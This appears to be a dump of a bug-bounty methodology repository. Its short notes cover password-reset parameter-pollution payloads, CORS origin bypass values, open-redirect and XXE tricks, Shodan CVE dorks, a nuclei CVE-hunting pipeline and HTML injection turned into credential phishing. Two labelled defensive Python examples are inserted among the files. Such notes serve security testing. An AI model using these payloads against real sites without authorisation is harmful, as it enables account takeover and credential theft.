├── CheckList ├── mindmap.png ├── Web_Checklist_by_Chintan_Gurjar.pdf ├── Web_Penetration_Testing_Methodology@2x.png └── Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf ├── Subdomain_Takeover ├── dns.png ├── cname.png ├── cname_buy.png ├── subdomain_takeover.png ├── Easy_Methods.md ├── Subdomain_Takeover.md └── Sub_or_top_level_domain_takeover.md ├── Sign_Up_Functionality ├── Signup_Mindmap.png └── Hunting_for_bugs_in_signup_feature.md ├── CMS ├── Moodle.md ├── Drupal.md ├── AEM.md └── wordpress.md ├── Authentication_Bypass ├── account_ban_bypass.md ├── OTP_Bypass.md └── 2FA_Bypasses.md ├── Password_Reset_Functionality ├── Account_Takeover_By_Password_Reset_Functionality.md ├── README.md ├── Password_Reset_Token_Leakage.md ├── Password_Reset_Flaws_by_Sm4rty.md └── Top_5_Password_Reset_Bugs ├── OAuth ├── README.md └── OAuth 2.0 Hunting Methodology.md ├── Rate_limit ├── No Rate-limit on Promo.md ├── No Rate-Limit on Verify-PhoneNo.md ├── No Rate-limit on Verify-email.md ├── No Rate-limit on forget-password.md ├── No Rate-limit on Invite User.md ├── README.md └── RateLimitBypass.md ├── SSTI └── SSTI.md ├── Sensitive_Info_Leaks ├── Shodan_cve_dorks.md ├── Version_Leak.md ├── Github_Recon_Method.md ├── Google_Dorks.md └── Github-dorks.md ├── MFA_Bypasses ├── README.md └── 2FA_Bypass.md ├── CONTRIBUTING.md ├── JIRA └── README.md ├── CORS ├── CORS_Bypasses.md └── CORS.md ├── .github └── FUNDING.yml ├── CSRF ├── README.md └── Cross_Site_Request_Forgery_Bypass.md ├── Open_Redirection ├── Open_Redirection_Bypass.md └── find_OpenRedirect_trick.md ├── XXE ├── XXE_Methods.md └── Billion_Laugh_Attack.md ├── HTML_Injection └── HTML_Injection_on_password_reset_page.md ├── CVES └── easycve.md ├── Parameter_Pollution └── Parameter_Pollution_in_social_sharing_buttons.md ├── EXIF_Geo_Data_Not_Stripped └── exif_geo.md ├── SSRF ├── Blind_SSRF.md └── SSRF-old.md ├── Status_Code_Bypass ├── README.md └── 403Bypass.md ├── API_Testing ├── Reverse_Engineer_an_API.md └── 
Hidden_API_Functionality_Exposure.md ├── Weak_Password_Policy └── Weak_password_policy.md ├── BrokenLinkHijacking └── BrokenLinkHijacking.md ├── Misconfigurations ├── Default_Credential_And_Admin_Panel.md ├── S3-Bucket_Misconfig.md └── Docker.md ├── Tabnabbing └── Tabnabbing.md ├── Host-Header └── Host-Header.md ├── Recon ├── Workflow.md ├── subdomain_enumeration.md └── Github_Dorking.md ├── GraphQL └── GraphQL.md ├── XSS ├── XSS_Bypass.md ├── Automated_XSS.md ├── post_message_xss.md ├── Bypass_CSP.md └── Xss.md ├── File_Upload └── old_file_upload_bypass.md ├── Account_Takeovers_Methodologies └── Account_Takeovers_Methods.md ├── HTTP_Desync └── http_desync.md ├── CODE_OF_CONDUCT.md ├── Application_Level_DoS └── ALD_Methods.md ├── JWT └── OLD_JWT_ATTACK_Notes.md ├── Web_Source_Review └── codereviewtips.md ├── IDOR └── IDOR-Old.md ├── FindOriginIP └── FindOrigin.md ├── WAF_Bypasses └── WAF_Bypass_Using_headers.md ├── Broken_Auth_And_Session_Management └── Session_based_bugs.md ├── SQLi └── SQL_Injection.md ├── SUMMARY.md └── Race_Condition └── race_conditions.md /CheckList/mindmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/CheckList/mindmap.png -------------------------------------------------------------------------------- /Subdomain_Takeover/dns.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Subdomain_Takeover/dns.png -------------------------------------------------------------------------------- /Subdomain_Takeover/cname.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Subdomain_Takeover/cname.png -------------------------------------------------------------------------------- /Subdomain_Takeover/cname_buy.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Subdomain_Takeover/cname_buy.png -------------------------------------------------------------------------------- /Sign_Up_Functionality/Signup_Mindmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Sign_Up_Functionality/Signup_Mindmap.png -------------------------------------------------------------------------------- /Subdomain_Takeover/subdomain_takeover.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Subdomain_Takeover/subdomain_takeover.png -------------------------------------------------------------------------------- /CheckList/Web_Checklist_by_Chintan_Gurjar.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf -------------------------------------------------------------------------------- /CheckList/Web_Penetration_Testing_Methodology@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/CheckList/Web_Penetration_Testing_Methodology@2x.png -------------------------------------------------------------------------------- /CheckList/Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/CheckList/Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf -------------------------------------------------------------------------------- /CMS/Moodle.md: 
-------------------------------------------------------------------------------- 1 | ## Mass Hunting XSS — Moodle 2 | * [https://dewangpanchal98.medium.com/mass-hunting-xss-moodle-ed4b50c82516](https://dewangpanchal98.medium.com/mass-hunting-xss-moodle-ed4b50c82516) 3 | 4 | ## Author: 5 | [@th3.d1p4k](https://twitter.com/DipakPanchal05) 6 | -------------------------------------------------------------------------------- /Authentication_Bypass/account_ban_bypass.md: -------------------------------------------------------------------------------- 1 | ### How to bypass account ban 2 | 3 | Steps: 4 | ``` 5 | If you got ban from xyz.com try to see other domain like forms etc where you need the same account to login. 6 | you maybe able to login from forms.xyz.com and its a bypass I found it on a hackerone private program. 7 | ``` 8 | -------------------------------------------------------------------------------- /CMS/Drupal.md: -------------------------------------------------------------------------------- 1 | ## Drupal Nodes 2 | 3 | Tips: 4 | ``` 5 | If you hunt on a Drupal website: fuzz with intruder on '/node/$' where '$' is a number (from 1 to 500 for example). 6 | You could find hidden pages (test, dev) which are not referenced by the search engines. 7 | ``` 8 | 9 | * [adrien_jeanneau](https://twitter.com/adrien_jeanneau/status/1273952564430725123?t=SUinUf09jxjRXu1yF9AQDg&s=19) 10 | -------------------------------------------------------------------------------- /Password_Reset_Functionality/Account_Takeover_By_Password_Reset_Functionality.md: -------------------------------------------------------------------------------- 1 | 2 | ``` 3 | 1. email= victim@gmail.com&email=attacker@gmil.com 4 | 2. email= victim@gmail.com%20email=attacker@gmil.com 5 | 3. email= victim@gmail.com |email=attacker@gmil.com 6 | 4. email= victim@gmail.com%0d%0acc:attacker@gmil.com 7 | 5. 
email= victim@gmail.com&code= my password reset token 8 | ``` 9 | ### Authors 10 | 11 | @tamimhasan404 12 | -------------------------------------------------------------------------------- /Password_Reset_Functionality/README.md: -------------------------------------------------------------------------------- 1 | # Password Reset Mindmap 2 | ![https://pbs.twimg.com/media/EhN29bpU8AMvLxx?format=jpg&name=medium](https://pbs.twimg.com/media/EhN29bpU8AMvLxx?format=jpg&name=medium) 3 | 4 | # Source 5 | * [Twitter](https://twitter.com/N008x/status/1302515523557548032/photo/1) 6 | * [Blog](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) 7 | # Authors 8 | * [KathanP19](https://twitter.com/KathanP19) 9 | -------------------------------------------------------------------------------- /OAuth/README.md: -------------------------------------------------------------------------------- 1 | # Some MindMap 2 | --- 3 | ### OAuth by Hack3rSr0lls 4 | ![https://pbs.twimg.com/media/EZ1WqmcXYAAqwSH?format=jpg&name=900x900](https://pbs.twimg.com/media/EZ1WqmcXYAAqwSH?format=jpg&name=900x900) 5 | 6 | ### Source 7 | * [https://twitter.com/hackerscrolls/status/1269266750467649538](https://twitter.com/hackerscrolls/status/1269266750467649538) 8 | 9 | ### Author 10 | * [KathanP19](https://twitter.com/KathanP19) 11 | -------------------------------------------------------------------------------- /Rate_limit/No Rate-limit on Promo.md: -------------------------------------------------------------------------------- 1 | ## No Rate-Limit on Promo 2 | 3 | ### Steps To Reproduce: 4 | - 1) Go to URL - `https://abc.target.com/product/121/checkout/promo` 5 | - 2) Navigate to `Offer/Promo/Coupon code` option 6 | - 3) Enter the random digit 7 | - 4) `Intercept the Request` and Send to intruder 8 | - 5) Apply payload & `Start attack` 9 | 10 | ### Impact : 11 | - Financial Loss, an attacker can easily bruteforce all promo/coupon/Offer codes. 
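The write-up above (and the sibling Rate_limit notes on verification, reset and invite e-mails) describes what happens when an endpoint has no request budget. The following is an added example, not code from the HowToHunt repository, of the server-side control that defeats that Intruder run: a sliding-window limiter that enforces two independent budgets, one per source IP and endpoint, one per target (the coupon field, or the victim's e-mail or phone number), so that rotating source addresses does not help. The limits, the fake clock and the addresses are constructed assumptions.

```python
"""Added example, not code from the HowToHunt repository: a server-side rate
limiter of the kind that stops the Intruder bursts the Rate_limit write-ups
describe (promo/coupon guessing here, and the repeated verification, reset and
invite e-mails in the sibling files).  Two independent budgets are enforced:

  * per client  (source IP + endpoint): one source cannot hammer an endpoint;
  * per target  (the coupon field, or the victim's e-mail / phone number):
    an attacker rotating IPs still cannot flood one victim or guess one code.

The limits, the fake clock and the addresses below are constructed for the
example; they are not values from any real target.
"""
from collections import deque
import time


class SlidingWindowLimiter:
    """Allow at most `limit` events per `window` seconds for each key."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock            # injectable so the example is deterministic
        self._events = {}             # key -> deque of event timestamps

    def allow(self, key):
        now = self.clock()
        q = self._events.setdefault(key, deque())
        while q and now - q[0] >= self.window:   # expire old timestamps
            q.popleft()
        if len(q) >= self.limit:
            return False              # budget for this key is exhausted
        q.append(now)
        return True


class FakeClock:
    """Deterministic clock: the example advances time explicitly."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class RateLimitedEndpoint:
    """Wraps a sensitive action (send a mail, check a coupon) with both budgets."""

    def __init__(self, per_client, per_target):
        self.per_client = per_client
        self.per_target = per_target
        self.performed = []           # actions that actually ran (mails sent etc.)

    def handle(self, client_ip, endpoint, target):
        """Return an HTTP status: 200 when the action ran, 429 when throttled."""
        if not self.per_client.allow((client_ip, endpoint)):
            return 429
        if not self.per_target.allow((endpoint, target.lower())):
            return 429
        self.performed.append((client_ip, endpoint, target))
        return 200


def build_endpoint(clock, client_limit=5, target_limit=3):
    """Constructed policy: 5 requests/minute per IP, 3 per hour per target."""
    return RateLimitedEndpoint(
        per_client=SlidingWindowLimiter(client_limit, 60.0, clock),
        per_target=SlidingWindowLimiter(target_limit, 3600.0, clock),
    )


def simulate_intruder_burst(requests=100):
    """100 identical requests from one IP at one victim (the write-ups'
    'null payloads, count 100' run).  Returns (accepted, throttled)."""
    ep = build_endpoint(FakeClock())
    statuses = [ep.handle("203.0.113.10", "/verify-email", "victim@example.com")
                for _ in range(requests)]
    return statuses.count(200), statuses.count(429)


def simulate_ip_rotation(ips=20):
    """One request per source IP, all aimed at one victim: the per-client
    budget alone would let every one through; the per-target budget caps it."""
    ep = build_endpoint(FakeClock())
    statuses = [ep.handle(f"198.51.100.{i}", "/forgot-password", "victim@example.com")
                for i in range(ips)]
    return statuses.count(200)


def legit_retry_after_window():
    """A real user who hits the cap can try again once the window has passed.
    Returns (status of the throttled attempt, status after the window)."""
    clock = FakeClock()
    ep = build_endpoint(clock)
    for _ in range(4):               # 3 succeed, the 4th is throttled
        last = ep.handle("203.0.113.10", "/forgot-password", "user@example.com")
    clock.advance(3600)              # the 1 h per-target window has elapsed
    return last, ep.handle("203.0.113.10", "/forgot-password", "user@example.com")


if __name__ == "__main__":
    print(simulate_intruder_burst(), simulate_ip_rotation(), legit_retry_after_window())
```

The per-target budget is the one that matters for the e-mail and SMS variants: it caps how many messages one victim address can ever receive per hour, whatever the source, which is the property the "IP based blocking" mitigation listed in those files does not give on its own. In production the deques would live in a shared store (Redis or similar) so that every application instance sees the same counts.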
-------------------------------------------------------------------------------- /SSTI/SSTI.md: -------------------------------------------------------------------------------- 1 | # Some MindMaps 2 | --- 3 | ### SSTI Finding Attack Vector by @what_web 4 | ![https://pbs.twimg.com/media/EnwZh7qXcAEB3wu?format=jpg&name=large](https://pbs.twimg.com/media/EnwZh7qXcAEB3wu?format=jpg&name=large) 5 | 6 | ### Source 7 | * [https://twitter.com/jae_hak99/status/1331967876417327104?s=20](https://twitter.com/jae_hak99/status/1331967876417327104?s=20) 8 | 9 | ### Tools 10 | + [tplmap](https://github.com/epinna/tplmap) 11 | ### Author 12 | * [0xsunil](https://twitter.com/0xsunil) 13 | -------------------------------------------------------------------------------- /Sensitive_Info_Leaks/Shodan_cve_dorks.md: -------------------------------------------------------------------------------- 1 | ## CVE's Shodan Dorks. 2 | 3 | * Big IP shodan Search:- 4 | 5 | `http.title:"BIG-IP®-Redirect" org:Org` 6 | 7 | * CVE 2020-3452 8 | 9 | ` http.html_hash:-628873716 10 | “set-cookie: webvpn;”` 11 | 12 | * CVE CVE-2019-11510 13 | 14 | `http.html:/dana-na/` 15 | 16 | * CVE-2020–5902 17 | 18 | ```inurl:/tmui/login.jsp``` 19 | 20 | 21 | ## Author: 22 | - [@manasH4rsh](https://twitter.com/manasH4rsh) 23 | - [Fani Malik](https://twitter.com/FaniMalikHack) 24 | -------------------------------------------------------------------------------- /CMS/AEM.md: -------------------------------------------------------------------------------- 1 | ## Adobe Experience Manager 2 | 3 | ### Tools 4 | + [aem-hacker](https://github.com/0ang3el/aem-hacker) 5 | + [aemscan](https://github.com/Raz0r/aemscan) 6 | 7 | ### Wordlist for fuzzing 8 | + [aem.txt](https://raw.githubusercontent.com/clarkvoss/AEM-List/main/paths) 9 | 10 | ### Resources 11 | + [Approaching AEM](https://www.bugcrowd.com/resources/webinar/aem-hacker-approaching-adobe-experience-manager-web-apps/) 12 | + [Securing 
AEM](https://www.slideshare.net/0ang3el/securing-aem-webapps-by-hacking-them) 13 | -------------------------------------------------------------------------------- /MFA_Bypasses/README.md: -------------------------------------------------------------------------------- 1 | # Some MindMaps 2 | --- 3 | ### 2FA Bypass by Hack3rScr0lls 4 | ![https://pbs.twimg.com/media/EW8vBWEX0AAxcVj?format=jpg&name=small](https://pbs.twimg.com/media/EW8vBWEX0AAxcVj?format=jpg&name=small) 5 | 6 | ### Source 7 | * [https://twitter.com/hackerscrolls/status/1256276376019230720](https://twitter.com/hackerscrolls/status/1256276376019230720) 8 | 9 | ### 2FA Bypass by Harshbothra 10 | * [MindMap](https://www.mindmeister.com/1736437018?t=SEeZOmvt01) 11 | 12 | ### Author 13 | * [KathanP19](https://twitter.com/KathanP19) 14 | -------------------------------------------------------------------------------- /Password_Reset_Functionality/Password_Reset_Token_Leakage.md: -------------------------------------------------------------------------------- 1 | Password Reset Token Leakage 2 | 3 | Steps: 4 | 1.Sent a password reset request using forget password 5 | 2.Check your email 6 | 3.copy your reset page link and paste in another tab and make burp intercept on. 7 | 4.Look for every request if you find similiar token that is in reset link with other domain like: bat.bing.com or facebook.com 8 | 5.Than there is reset password token leakage. 
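The steps above are done by eye in Burp. As an added example (not code from the HowToHunt repository), here is the same check as a script: given the e-mailed reset link and the requests a proxy captured while the reset page loaded, it lists every third-party host that received the token, and it tests whether the page's Referrer-Policy would have kept the token out of cross-site Referer headers. The capture, the token and the host names are constructed sample data.

```python
"""Added example, not code from the HowToHunt repository: detection logic for
the reset-token leakage check above.  Given the reset link received by e-mail
and the requests a proxy captured while that page loaded, it reports every
third-party host that received the token (in the request URL, the Referer
header or a POST body) and checks whether the reset page sends a
Referrer-Policy that keeps the URL out of cross-site Referer headers.
The captured requests are constructed sample data, not traffic from any site.
"""
from urllib.parse import parse_qs, urlsplit

RESET_LINK = "https://example.com/account/reset?token=7f3a9c1d2e4b5a6f"

# Constructed capture: (method, url, request headers, body), as a proxy logs it.
CAPTURED = [
    ("GET", RESET_LINK, {}, ""),
    ("GET", "https://example.com/static/app.js", {"Referer": RESET_LINK}, ""),
    ("GET", "https://bat.bing.com/action/0?ti=12345&evt=pageLoad",
     {"Referer": RESET_LINK}, ""),
    ("POST", "https://www.facebook.com/tr/",
     {"Referer": "https://example.com/account/reset"},
     "ev=PageView&dl=" + RESET_LINK),          # pixel script posted location.href
    ("GET", "https://cdn.example.net/font.woff2", {"Referer": "https://example.com/"}, ""),
]

# Referrer-Policy values that strip path and query from cross-origin Referers.
SAFE_POLICIES = {"no-referrer", "same-origin", "origin", "strict-origin",
                 "origin-when-cross-origin", "strict-origin-when-cross-origin"}


def token_from_link(link):
    """The reset token is the `token` query parameter of the e-mailed link."""
    return parse_qs(urlsplit(link).query)["token"][0]


def find_token_leaks(reset_link, captured):
    """Return [(third_party_host, where)] for every captured request to another
    host that carries the token; `where` names the leaking part(s)."""
    first_party = urlsplit(reset_link).hostname
    token = token_from_link(reset_link)
    leaks = []
    for _method, url, headers, body in captured:
        host = urlsplit(url).hostname
        if host == first_party:
            continue                       # first-party requests may carry it
        where = [part for part, text in (("url", url),
                                          ("referer", headers.get("Referer", "")),
                                          ("body", body)) if token in text]
        if where:
            leaks.append((host, "+".join(where)))
    return leaks


def referrer_policy_prevents_leak(response_headers):
    """True if the reset page's Referrer-Policy would keep the token out of
    cross-origin Referer headers.  The header may list fallbacks; browsers use
    the last value they recognise."""
    raw = response_headers.get("Referrer-Policy", "")
    policy = raw.split(",")[-1].strip().lower()
    return policy in SAFE_POLICIES


if __name__ == "__main__":
    for host, where in find_token_leaks(RESET_LINK, CAPTURED):
        print(f"token sent to {host} via {where}")
```

On the constructed capture the bing request leaks through the Referer header and the facebook request through a POST body. A Referrer-Policy fixes only the first channel: a third-party script on the page can still read `location.href`, so the durable fix is to keep the token out of the page URL (single-use, short-lived, exchanged server-side) and to serve the reset page without third-party scripts.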
9 | 10 | ### Authors 11 | 12 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter) 13 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | ## Contributing 2 | 3 | If you have any ideas for things we should include, please use ONE of the following methods to submit them: 4 | 5 | * Send us pull requests 6 | * Create an issue in the project (with links, and we'll parse and incorporate them) 7 | * Message us on twitter `https://twitter.com/KathanP19` or `https://twitter.com/remonsec` with content to add. 8 | 9 | Significant effort is made to give attribution for these content whenever possible, and if you are a content owner or know who the original author/curator is, please let us know so we can give proper credit. 10 | -------------------------------------------------------------------------------- /Sensitive_Info_Leaks/Version_Leak.md: -------------------------------------------------------------------------------- 1 | # Version Leak 2 | 3 | ``` 4 | step1. go to the target says- https://redacted.com 5 | step2. open view page source 6 | step3. check for path, directories 7 | step4. go that path says- https://redacted.com/theme/css/file.css 8 | step5. try to visit all directories and check it is accessible or not. 9 | step5. if it is give 403 10 | step6. add %0, %m, %2e, says- https://redacted.com/%0theme and then check the response, it will show the running server name, and version information. 11 | ``` 12 | - And check for also css path url, sometime it contain some path. 
13 | -------------------------------------------------------------------------------- /JIRA/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Blogs 3 | - Jira vulnerabilities and how they are exploited in the wild - [thehackerish Blog](https://thehackerish.com/jira-vulnerabilities-and-how-they-are-exploited-in-the-wild/) 4 | 5 | 6 | # Tools 7 | - [Jira-Lens](https://github.com/MayankPandey01/Jira-Lens) [Jira-Lens 🔍 is a Python Based vulnerability Scanner for JIRA.This tool Performs 25+ Checks including CVE's and Multiple Disclosures on the Provided JIRA Instance] 8 | 9 | 10 | # Author 11 | **Name:** Mayank Pandey 12 | 13 | **Handle:** [@mayank_pandey01](https://twitter.com/mayank_pandey01) 14 | 15 | -------------------------------------------------------------------------------- /CORS/CORS_Bypasses.md: -------------------------------------------------------------------------------- 1 | # CORS Bypass 2 | 1. `Origin:null` 3 | 2. `Origin:attacker.com` 4 | 3. `Origin:attacker.target.com` 5 | 4. `Origin:attackertarget.com` 6 | 5. `Origin:sub.attackertarget.com` 7 | 6. `Origin:attacker.com and then change the method Get to post/Post to Get` 8 | 7. `Origin:sub.attacker target.com` 9 | 8. `Origin:sub.attacker%target.com` 10 | 9. 
`Origin:attacker.com/target.com` 11 | 12 | ### Authors 13 | 14 | * [@tamimhasan404](https://twitter.com/tamimhasan404) 15 | 16 | # Reference Tweets 17 | https://twitter.com/trbughunters/status/1287023673845612546 18 | 19 | https://twitter.com/Paresh_parmar1/status/1265251507655630848 20 | 21 | https://twitter.com/Alra3ees/status/1141504347089584128 22 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | custom: ['https://www.buymeacoffee.com/kathanp19'] 13 | -------------------------------------------------------------------------------- /CSRF/README.md: -------------------------------------------------------------------------------- 1 | # Some MindMap 2 | --- 3 | ### 6 CSRF Bypass by Hack3rSr0lls 4 | ![https://pbs.twimg.com/media/EY70bxkWkAAFzGb?format=jpg&name=900x900](https://pbs.twimg.com/media/EY70bxkWkAAFzGb?format=jpg&name=900x900) 5 | 6 | ### CSRF Mindmap 7 | 
![https://gblobscdn.gitbook.com/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LrAtLpniLVMCWL-CVF-%2F-LrAtNhzv9bhi7vB_zs7%2Fimage.png?alt=media&token=ead94d04-f31d-4d99-9087-9bf92d091b0b](https://gblobscdn.gitbook.com/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LrAtLpniLVMCWL-CVF-%2F-LrAtNhzv9bhi7vB_zs7%2Fimage.png?alt=media&token=ead94d04-f31d-4d99-9087-9bf92d091b0b) 8 | 9 | ### Source 10 | * [https://twitter.com/hackerscrolls/status/1265217322308046849](https://twitter.com/hackerscrolls/status/1265217322308046849) 11 | 12 | ### Author 13 | * [KathanP19](https://twitter.com/KathanP19) 14 | -------------------------------------------------------------------------------- /Open_Redirection/Open_Redirection_Bypass.md: -------------------------------------------------------------------------------- 1 | # Open Redirection Bypass Trick: 2 | 3 | This bypass I found in a application while I doing pentesting. I hope it will helps you too! 4 | 5 | 1. While you I trying to redirect https://targetweb.com?url=http://attackersite.com it did not redirected! 6 | 2. I Created a new subdomain with with www.targetweb.com.attackersite.com 7 | 3. And when I tried to redirect with https://targetweb.com?url=www.targetweb.com.attackersite.com 8 | 4. It will successfully redirected to the www.targetweb.com.attackersite.com website! 9 | 5. Due to the bad regex it has been successfully bypass their protection! 10 | 11 | ### Authors: 12 | * [@bishal0x01](https://twitter.com/bishal0x01) 13 | 14 | ### Reference Tweets: 15 | * https://twitter.com/bishal0x01/status/1262021038080053248 16 | -------------------------------------------------------------------------------- /XXE/XXE_Methods.md: -------------------------------------------------------------------------------- 1 | # XML External Entities. 2 | These are my methods to check and hunt for XML External Entities. 3 | I might be missing a lot of things but as the community believe in "sharing is caring" by @CXVVMVII. 4 | 5 | ## Methods 6 | 1. 
Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "applcation/xml". 7 | 2. File Uploads allows for docx/xlcs/pdf/zip , unzip the package and add your evil xml code into the xml files. 8 | 3. If svg allowed in picture upload , you can inject xml in svgs. 9 | 4. If the web app offers RSS feeds , add your milicious code into the RSS. 10 | 5. Fuzz for /soap api , some applications still running soap apis 11 | 6. If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse 12 | 13 | ## Twitter: 14 | * [whitechaitai](https://twitter.com/whitechaitai) 15 | -------------------------------------------------------------------------------- /Rate_limit/No Rate-Limit on Verify-PhoneNo.md: -------------------------------------------------------------------------------- 1 | ## Flaw-Name : Unlimited SMS Triggering 2 | --- 3 | ### Steps To Reproduce 4 | - 1 - Open this url `https://target.com/phone-number-verify` 5 | - 2 - Enter the `victim's mob. number` 6 | - 3 - `Intercept the request` and send the request to intruder 7 | - 4 - Use payload type as `NULL payloads` and set the payload count & `start attack` 8 | --- 9 | ### Impact : 10 | - If the company is using any email service software API(such as AWS,GCP..etc) or some tool that has been bought for the emails being sent on the support domain, the rate limit can result in `financial loss` and it can also `slow down your services` as huge/mass mails will `lead to disruption of data` that original user might send or the quota that has been bought might be exhausted. 
---
### Mitigation -

- 1 - IP Based Blocking
- 2 - Captcha
- 3 - Firewall
- 4 - Reducing the number of API requests
-------------------------------------------------------------------------------- /Rate_limit/No Rate-limit on Verify-email.md: --------------------------------------------------------------------------------
## Flaw-Name : Unlimited Email Triggering
---
### Steps To Reproduce :
- 1 - Navigate to : `https://abc.target.com/verify-email`
- 2 - `Intercept` the request in BurpSuite
- 3 - Send the request to `Intruder` and clear the payload position
- 4 - Use `Null payloads` as payload type and set the payload count to 100
- 5 - `Start attack`

---
### Impact :
- If the company is using any email service software API or some tool that has been bought for the emails being sent on the support domain, the missing rate limit can result in `financial loss`, and it can also `slow down your services`, as huge/mass mails will `lead to disruption of data` that the original user might send, or the quota that has been bought might be exhausted.
---
### Mitigation :

- 1 - IP Based Blocking
- 2 - Captcha
- 3 - Firewall
- 4 - Reducing the number of API requests
-------------------------------------------------------------------------------- /HTML_Injection/HTML_Injection_on_password_reset_page.md: --------------------------------------------------------------------------------

## Summary
Password reset emails are usually addressed to your account name, followed by the reset link. If the application allows your account name to contain tags and special characters, you should try this.

### Steps

1. Create your account
2. Edit your name to `attacker` wrapped in an HTML tag, or to `"abc>attacker`, and save it.
3. Request a password reset and check your email.
4. You will notice the tag getting executed

* HTML injection is usually considered a low to medium severity bug, but you can escalate the severity by serving a malicious link with a link tag, for eg: `attacker` as the link text

* You can redirect the user to your malicious domain and serve a fake reset password page to steal credentials.
Also you can serve a previously found XSS page and steal user cookies etc. The creativity lies with you.

## Author
[@C1pher15](https://twitter.com/C1pher15)
-------------------------------------------------------------------------------- /Rate_limit/No Rate-limit on forget-password.md: --------------------------------------------------------------------------------
## Flaw-Name : No rate limit on forget/reset password leads to email triggering
---
### Steps To Reproduce
- 1 - Navigate to : `https://abc.target.com/forgot-password` or it could be `https://abc.target.com/reset-password`
- 2 - Enter the email of the victim
- 3 - `Intercept` the request in Burp Suite
- 4 - Send the request to the `Intruder` and clear payload positions
- 5 - Use `Null payloads` and set the payload count to 100
- 6 - `Start attack`


---
### Impact :
- If the company is using any email service software API or some tool that has been bought for the emails being sent on the support domain, the missing rate limit can result in `financial loss`, and it can also `slow down your services`, as huge/mass mails will `lead to disruption of data` that the original user might send, or the quota that has been bought might be exhausted.
15 | --- 16 | ### Mitigation : 17 | 18 | - 1 - IP Based Blocking 19 | - 2 - Captcha 20 | - 3 - Firewall 21 | - 4 - Reducing the number of API requests -------------------------------------------------------------------------------- /CVES/easycve.md: -------------------------------------------------------------------------------- 1 | # Easy CVES using Researching 2 | 3 | ### Tools 4 | * Google 5 | * Twitter 6 | * Nuclei 7 | 8 | ## Steps: 9 | ``` 10 | 1.Grab all the subdomains i.e, subfinder -d domain.com | tee -a domains.txt 11 | 2.Grap all alive domains i.e, cat domains.txt | httpx -status-code | grep 200 | cut -d " " -f1 | tee -a alive.txt 12 | 3.Run nuclei basic-detection,panels,workflows,cves templates differently and store results in different file. i.e, cat alive.txt | nuclei -t nuclei-templates/workflows | tee -a workflows. 13 | 4.Read each output carefully with patience. 14 | 5.Find interest tech used by target. i.e, jira 15 | 6.put that link into browser check the version used by target. 16 | 7.Go on google search with jira version exploit. 17 | 8.grep the cves 18 | 9.Go to twitter in explore tab search CVE(that you found from google) poc or CVE exploit 19 | 10.Go to google and put cve or some details grab from twitter for a better poc read writeups related to that. 20 | 11.Try all cves if success report it.:) 21 | ``` 22 | 23 | ### Authors 24 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter) 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /Parameter_Pollution/Parameter_Pollution_in_social_sharing_buttons.md: -------------------------------------------------------------------------------- 1 | # Parameter Pollution in social sharing buttons 2 | 3 | Hi Guys, 4 | Though it is not severe bug.But still some organizations take this seriously. 5 | 6 | ## Steps : 7 | 8 | ``` 9 | 1.Browse through your target. 
10 | say https://target.com 11 | 2.Find a article or blog present on target website which must have a link to share that blog on different social networks such as 12 | Facebook,Twitter etc. 13 | 3.Let's say we got and article with url: 14 | https://taget.com/how-to-hunt 15 | then just appened it with payload ?&u=https://attacker.com/vaya&text=another_site:https://attacker.com/vaya 16 | so our url will become 17 | https://taget.com/how-to-hunt?&u=https://attacker.com/vaya&text=another_site:https://attacker.com/vaya 18 | 4.Now hit enter with the abover url and just click on share with social media. 19 | Just observe the content if it is including our payload i.e. https://attacker.com 20 | Then it is vulnerable or else try next target. 21 | ``` 22 | ## References: 23 | * https://hackerone.com/reports/105953 24 | * Google 25 | 26 | ## Author 27 | * [KenAdams000](https://twitter.com/KenAdams000) 28 | -------------------------------------------------------------------------------- /EXIF_Geo_Data_Not_Stripped/exif_geo.md: -------------------------------------------------------------------------------- 1 |

# Summary

When a user uploads an image to example.com, the uploaded image's EXIF geolocation data does not get stripped. As a result, anyone can get sensitive information about example.com users such as their geolocation and their device information (device name, version, software and software version used, etc.).

# Steps to reproduce

1. Go to GitHub (https://github.com/ianare/exif-samples/tree/master/jpg)
